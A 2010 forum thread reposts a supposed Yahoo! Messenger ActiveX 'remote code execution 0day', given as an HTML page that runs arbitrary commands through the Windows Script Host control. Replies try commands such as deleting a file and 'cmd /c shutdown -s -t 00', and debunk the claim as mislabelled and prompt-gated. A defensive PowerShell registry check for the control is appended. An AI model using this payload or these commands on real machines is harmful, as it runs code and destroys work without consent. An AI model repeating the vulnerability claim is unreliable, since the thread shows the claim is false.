Cheater Posted July 26, 2010

##################################{In The Name Of Allah The Merciful}######################
# Title : Yahoo! messenger (V 10.0.0.525-us)beta (yt.dll) 0day suffer from ActiveX Remote Code Execution
# Tested : Windows xp (sp3)
# Author : R3d-D3v!L <X[at]hotmail.co.jp>
# Credits to : XP10_HACKER ((XP10.ME-xp10.com))
# Greetz : DOLLY-MERNA & DR_DAShER & JUPA & hetlar jaddah& Abo-ShA@D
# all member at XP10.ME
########################################################

infected path : Program Files\Yahoo!\Companion\Installs\cpn0\yt.dll
reason of infected : Function c ( ByVal bstr As String ) As String in (C) in IYTHelpe

EXPLO!T:

    <html>
    </font></b></p>
    <p>
    <object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target' ></object>
    <script language='vbscript'>
    arg1="TYPE YOUR EXEcUT!ON CODE"
    target.run arg1
    </script></p>

Source: Yahoo! messenger (v10.0.0.525-us beta) yt.dll ActiveX Remote Code Execution 0day

Nytro Posted July 26, 2010

It only works from Internet Explorer, but it works.

AlStar Posted July 26, 2010

I tried it on 10.0.0.1270 with

    arg1="del test.tst"

and

    arg1="del test.tst;"

and got no result... Is what I wrote wrong, or is it clearly not compatible with the latest version of Y!M?

ROFL Posted July 26, 2010

What does this have to do with Yahoo! Messenger? It is copied from here and it is an "exploit" for IE (it asks for your permission whether you want to run it or not): http://www.exploit-db.com/exploits/11457/

It will soon be deleted from exploit-db as well; for now it is unverified.

Nytro Posted July 26, 2010

Yes, it is about C:\Windows\system32\wshom.ocx, the Windows Script Host runtime.

AlStar: "taskkill /IM winamp.exe /F"

From Internet Explorer, click Allow on Blocked Content.

ROFL Posted July 26, 2010

Well, I still don't understand what it has to do with Y! M. If you want to test this, you save it as exploit.html and open it with IE. Where do you use Y! M?

AlStar Posted July 26, 2010

> AlStar: "taskkill /IM winamp.exe /F"
> From Internet Explorer, click Allow on Blocked Content.

Heh heh, how did you know I had Winamp running? But does only taskkill work? Anyway, it's lame that you have to click Allow, plus everyone has heard of Firefox and Opera..

ROFL Posted July 26, 2010

> Heh heh, how did you know I had Winamp running? But does only taskkill work? Anyway, it's lame that you have to click Allow, plus everyone has heard of Firefox and Opera..

Anything works:

    cmd /c shutdown -s -t 00

+ It only works locally; if you upload it to a host, nothing happens.

Conclusion: Useless!
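
Added example, not part of the thread or of the original advisory: a PowerShell check for the point ROFL and Nytro raise. It resolves the CLSID from the posted page to the binary actually registered for it (Nytro names wshom.ocx) and reports the registry settings that decide whether Internet Explorer loads the control silently, prompts, or blocks it. The function name `Get-ClsidTriage` and the output field names are made up for this example.

```powershell
# Added example. The CLSID comes from the <object> tag in the posted page;
# 'yt.dll' is the file the advisory blames.
param(
    [string]$Clsid       = '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',
    [string]$ClaimedFile = 'yt.dll'
)

# Component categories a control registers to tell IE it is safe on web pages.
$SafeForScripting = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
$SafeForInit      = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'
$KillBit          = 0x400  # "Compatibility Flags" bit that stops IE loading a control

function Get-ClsidTriage {   # hypothetical helper name
    param([string]$Clsid, [string]$ClaimedFile)

    $classKey = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
    if (-not (Test-Path -LiteralPath $classKey)) {
        return [pscustomobject]@{ Clsid = $Clsid; Registered = $false }
    }

    # The default value of InprocServer32 names the DLL/OCX that really gets loaded.
    $server = Get-Item -LiteralPath "$classKey\InprocServer32" -ErrorAction SilentlyContinue
    $path   = if ($server) { [string]$server.GetValue('') } else { '' }
    $progId = Get-Item -LiteralPath "$classKey\ProgID" -ErrorAction SilentlyContinue

    $catKey = "$classKey\Implemented Categories"
    $compat = "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    $flags  = 0
    if (Test-Path -LiteralPath $compat) {
        $flags = [int](Get-ItemProperty -LiteralPath $compat).'Compatibility Flags'
    }

    [pscustomobject]@{
        Clsid            = $Clsid
        Registered       = $true
        ProgId           = if ($progId) { $progId.GetValue('') } else { $null }
        ServerPath       = $path
        MatchesAdvisory  = ($path -and (Split-Path -Leaf $path) -ieq $ClaimedFile)
        SafeForScripting = Test-Path -LiteralPath "$catKey\$SafeForScripting"
        SafeForInit      = Test-Path -LiteralPath "$catKey\$SafeForInit"
        KillBitSet       = (($flags -band $KillBit) -ne 0)
    }
}

Get-ClsidTriage -Clsid $Clsid -ClaimedFile $ClaimedFile | Format-List
```

On 64-bit Windows, run it from a 32-bit PowerShell session as well, because 32-bit Internet Explorer reads COM registrations from the WOW6432Node view of the registry.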